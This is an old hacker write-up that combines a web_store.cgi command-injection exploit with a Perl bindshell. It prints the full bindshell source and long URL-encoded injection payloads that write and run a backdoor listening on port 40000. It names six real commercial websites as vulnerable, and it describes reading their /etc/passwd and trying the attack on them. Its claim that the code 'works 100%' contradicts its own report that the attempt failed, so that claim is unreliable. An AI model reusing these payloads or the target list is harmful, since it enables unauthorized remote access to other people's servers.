Bindshell for WebStore CGI Exploit Analysis
----------------------------------------------
Author's Note:
 
"Some old school combination of bindshell backdoor and cgi exploit." Original author's rights reserved. Compressed and reformatted to a one-page mail!
----------------------------------------------

INTRODUCTION

[d]uden of Hackers Digital Crime proposed the idea of using the BindShell exploit code of van Hauser (THC) in combination with web_store.cgi exploit to get backdoor access. If you would like to read more about the webstore exploit and the original proposal, the original paper can be accessed here http://www.h-d-c.org/download/source/webstorecgi.htm.

It is also indicated in the paper that the author of the idea included a little mistake in his UUEncoded url. This analysis aims to clarify all loopholes in his proposal, present the corrected code and probably give an idea as to how to apply this to current exploits.


CODES

  • webstore cgi exploit

    http://target/cgi-bin/Web_Store/web_store.cgi?page=../../path/filename%00ext

    http://target/cgi-bin/Web_Store/web_store.cgi ?page=../../../../../../../../bin/ls%20/etc%00.html%7C

  • van Hauser of THC's bindshell code

    #!/usr/bin/perl
    use Socket;
    $protocol = getprotobyname('tcp');
    socket(S, &PF_INET, &SOCK_STREAM, $protocol) || die "can't create socket\n";
    setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
    bind(S, sockaddr_in(40000, INADDR_ANY)) || die "can't bind\n";
    listen(S, 3) || die "can't listen\n";
    while (1)
    {
    YOP: accept (THC, S) || goto YOP;
    if (! ($pid=fork))
    {
    goto BYE if (! defined $pid);
    open STDIN, ">&THC";
    open STDOUT, ">&THC";
    open STDERR, ">&THC";
    exec "/bin/sh -i" || print THC "couldn't spawn shell\n";
    close THC;
    exit 0;
    }
    else
    {
    BYE: close THC;
    }
    }

  • [d]uden's webstore and bindshell combination code with an embedded mistake

    http://target/cgi-bin/Web_Store/web_store.cgi?page=../../../../../../../../bin/echo%20%5C%23%21/usr/bin/perl%20%3E%20/tmp/shell.pl%3B/bin/echo%20require%205.002%5C%3B%20use%20Socket%5C%3B%20%5C%24protocol%20%5C%3D%20getprotobyname%5C%28%5C%27tcp%5C%27%5C%29%5C%3B%20socket%5C%28S%2C%20%5C%26PF%5FINET%2C%20%5C%26SOCK%5FSTREAM%2C%20%5C%24protocol%5C%29%20%5C%7C%5C%7C%20die%20%5C%22can%5C%27t%20create%20socket%5Cn%5C%22%5C%3B%20setsockopt%5C%28S%2C%20SOL%5FSOCKET%2C%20SO%5FREUSEADDR%2C%201%5C%29%5C%3B%20bind%5C%28S%2C%20sockaddr%5Fin%5C%2840000%2C%20INADDR%5FANY%5C%29%5C%29%20%5C%7C%5C%7C%20die%20%5C%22can%5C%27t%20bind%5Cn%5C%22%5C%3B%20listen%5C%28S%2C%203%5C%29%20%5C%7C%5C%7C%20die%20%5C%22can%5C%27t%2 0listen%5Cn%5C%22%5C%3B%20while%20%5C%281%5C%29%20%7B%20YOP:%20accept%20%5C%28THC%2C%20S%5C%29%20%5C%7C%5C%7C%20goto%20YOP%5C%3B%20if%20%5C%28!%20%5C%28%5C%24pid%5C%3Dfork%5C%29%5C%29%20%7B%20goto%20BYE%20if%20%5C%28!%20defined%20%5C%24pid%5C%29%5C%3B%20open%20STDIN%2C%20%20%5C%22%5C%3C%5C%26THC%5C%22%5C%3B%20open%20STDOUT%2C%20%5C%22%5C%3E%5C%26THC%5C%22%5C%3B%20open%20STDERR%2C%20%5C%22%5C%3E%5C%26THC%5C%22%5C%3B%20exec%20%5C%22/bin/sh%20-i%5C%22%20%5C%7C%5C%7C%20print%20THC%20%5C%22couldn%5C%27t%20spawn%20shell%5Cn%5C%22%5C%3B%20close%20THC%5C%3B%20exit%200%5C%3B%7D%20else%20%7BBYE:%20close%20THC%5C%3B%7D%7D%20%3E%20/tmp/shell.pl%3B/bin/chmod%20777%20/tmp/shell.pl%3B/tmp/shell.pl%00.html%7C


    DECODING PROCESS

    The actual decoding was done manually. (Although it could have been done a lot easier if I have coded some perl script up.) Manual decoding process involved using a Hexadecimal converter. For example %20 would be equal to a space.

    Hexadecimal converter together with tables, cut and paste commands. hehe! click here to see the whole process.

    If you notice the RED colored %3C in the codes above, that indicates that it is the error in the code. The corrected code is as follows (be reminded that lines that i think wouldnt be that useful are already omitted):

    http://target/cgi-bin/Web_Store/web_store.cgi?page=../../../../../../../../bin/echo%20%5C%23%21/usr/bin/perl%20%3E%20/tmp/shell.pl%3B%20use%20Socket%5C%3B%20%5C%24protocol%20%5C%3D%20getprotobyname%5C%28%5C%27Tcp%5C%27%5C%29%5C%3B%20socket%5C%28S%2C%20%5C%26PF%5FINET%2C%20%5C%26SOCK%5FSTREAM%2C%20%5C%24protocol%5C%29%20%5C%7C%5C%7C%20die%20%5C%22can%5C%27t%20create%20socket%5Cn%5C%22%5C%3B%20setsockopt%5C%28S%2C%20SOL%5FSOCKET%2C%20SO%5FREUSEADDR%2C%201%5C%29%5C%3B%20bind%5C%28S%2C%20sockaddr%5Fin%5C%2840000%2C%20INADDR%5FANY%5C%29%5C%29%20%5C%7C%5C%7C%20die%20%5C%22can%5C%27t%20bind%5Cn%5C%22%5C%3B%20listen%5C%28S%2C%203%5C%29%20%5C%7C%5C%7C%20die%20%5C%22can%5C%27t%20listen%5Cn%5C%22%5C%3B%20while%20%5C%281%5C%29%20%7B%20YOP:%20accept%20%5C%28THC%2C%20S%5C%29%20%5C%7C%5C%7C%20goto%20YOP%5C%3B%20if%20%5C%28!%20%5C%28%5C%24pid%5C%3Dfork%5C%29%5C%29%20%7B%20goto%20BYE%20if%20%5C%28!%20defined%20%5C%24pid%5C%29%5C%3B%20open%20STDIN%2C%20%5C%22%5C%3E%5C%26THC%5C%22%5C%3B%20open%20STDOUT%2C%20%5C%22%5C%3E%5C%26THC%5C%22%5C%3B%20open%20STDERR%2C%20%5C%22%5C%3E%5C%26THC%5C%22%5C%3B%20exec%20%5C%22/bin/sh%20-i%5C%22%20%5C%7C%5C%7C%20print%20THC%20%5C%22couldn%5C%27t%20spawn%20shell%5Cn%5C%22%5C%3B%20close%20THC%5C%3B%20exit%200%5C%3B%7D%20else%20%7BBYE:%20close%20THC%5C%3B%7D%7D%20%3E%20/tmp/shell.pl%3B/bin/chmod%20777%20/tmp/shell.pl%3B/tmp/shell.pl%00.html%7C

    %3C represents a "<" symbol; while
    %3E represents a ">" symbol


    ANALYSIS

    In order to test our new found bindshell-webstore exploit, we must find vulnerable sites first. By trying to read /etc/passwd of the sites that contain webstore.cgi, we arrived at the following list of vulnerable sites:

    http://www.greensuperfood.com/cgi/spc/Web_store/web_store.cgi
    http://www.navygear.com/cgi-local/Web_store/web_store.cgi
    http://intellectua.com/cgi-bin/sgx/store/web_store.cgi
    http://www.northlandposter.com/cgi-bin/Web_store/web_store.cgi
    http://www.revhq.com/catalog/web_store.cgi
    http://www.ruesthaus.de/cgi-bin/shop/web_store.cgi

    After obtaining a modest list of vulnerable sites, we now try our bindshell-webstore exploit. The instructions from the original paper stated that "if you try to access this page you're browser will run a long long time. Don't worry about that, if it starts reading the page (there will be no output) just try to telnet to the host at port 40000".

    So we go to the URL, wait a lil while and try to telnet the site at port 40000. We should land at a shell, but did we?


    RECOMMENDATION

    If you expected any conclusion, there isnt any. Honestly, ive tried van Hausen's bindshell code on a working shell and it works. But when I try it in combination with the webstore exploit it doesnt seem to work at all. Theoretically, this SHOULD work. But when I try to read the file I made /tmp/shell.pl, it seems that the file doesnt exist!?

    There are many reasons as to why this is. It could be possible that the httpd-process user doesnt have any permission to write any file in the /tmp directory. The webstore could have also been upgraded or patched. It could also be that httpd-process user doesnt have any right to execute scripts.

    There are a lot of possible reasons as to why I was not able to execute this properly. All I can say is that, this code can be RECYCLED. For any future exploit which has the same attributes as webstore exploit we can just inject this code the same way [d]uden did with webstore exploit.

    This code works 100%. All credit should go the people concerned for their idea. I only clarified the mistake for the general masses.

    ----------------------------------------------
    z3r0kul
    R&D Department
    ERROR 404 Development Team
    ----------------------------------------------